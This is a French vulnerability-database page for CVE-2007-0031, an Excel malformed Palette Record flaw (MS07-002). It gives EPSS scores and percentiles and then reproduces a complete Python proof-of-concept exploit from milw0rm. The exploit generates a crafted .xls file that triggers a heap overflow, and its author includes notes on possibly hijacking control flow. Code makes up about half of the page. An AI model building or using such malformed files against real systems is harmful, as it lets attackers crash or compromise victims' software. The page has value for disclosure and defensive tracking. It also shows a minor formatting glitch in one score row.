CVE-2007-0031 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	63.98%	–	–
2023-03-12	–	–	–	81.45%	–
2023-04-02	–	–	–	84.87%	–
2023-06-18	–	–	–	85%	–
2023-10-08	–	–	–	87.19%	–
2023-11-19	–	–	–	89.02%	–
2024-02-04	–	–	–	89.02%	–
2024-06-02	–	–	–	89.02%	–
2024-06-09	–	–	–	90.14%	–
2024-07-21	–	–	–	89.24%	–
2024-09-15	–	–	–	93.39%	–
2024-12-22	–	–	–	94.52%	–
2025-01-19	–	–	–	94.52%	–
2025-03-18	–	–	–	–	74.39%
2025-03-18	–	–	–	–	74.39,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	98%
2023-04-02	98%
2023-06-18	98%
2023-10-08	98%
2023-11-19	98%
2024-02-04	99%
2024-06-02	99%
2024-06-09	99%
2024-07-21	99%
2024-09-15	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-03-18	99%

""" MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC ###### Author ###### LifeAsaGeek at gmail.com ... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs ######################## Vulnerablity Description ######################## Bound error occurs when parsing Palette Record and it causes Heap Overflow check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506 which is generated by DarunGrim ( and I want to say I'm not a person who made this analyzer ==; ) ############# Attack Vector ############# Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status ! Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere ) In *CERTAIN* environment( such as open excel file which is already opened) you can catch the flow by modify function pointer, but it doesn't have a reliablity at all Let me know if you have a good method to break down ###### Result ###### DOS ##### Notes ##### You should modify pyExcelerator module because it doesn't generate Palette Record pyExcelerator diff results would be like below diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\BIFFRecords.py pyExcelerator\BIFFRecords.py 1104a1105,1108 > def __init__(self): > BiffRecord.__init__(self) > self._rec_data = pack('<H', 0x0038) # number of colours > self._rec_data += 'A' * 0xe0 diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\Workbook.py pyExcelerator\Workbook.py 468,469c468 < result = '' < return result --- > return BIFFRecords.PaletteRecord().get() !! THIS IS ONLY FOR EDUCATIONAL PURPOSE !! - 2007.01.25 """ import sys, os from struct import * from pyExcelerator import * def CreateXLS(): w = Workbook() ws = w.add_sheet('MS07-002 POC') w.save( "before.xls") def ModifyXLS(): try: f = open( "before.xls", "rb") except: print "File Open Error ! " sys.exit(0) str = f.read() f.close() #write to malformed xls file f = open( "after.xls", "wb") PaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x0038) NewPaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x01FF) palette_idx = str.find( PaletteRecord) if palette_idx == -1: print "Cannot find Palette Record" sys.exit(0) str = str.replace( PaletteRecord, NewPaletteRecord) f.write( str) f.close() if __name__ == "__main__": print "===========================================================" print "MS07-002 Malformed Palette Record vulnerability DOS POC " print "Create POC Excel File after.xls" print "by LifeAsaGeek at gmail.com" print "===========================================================" CreateXLS() ModifyXLS() # milw0rm.com [2007-01-25]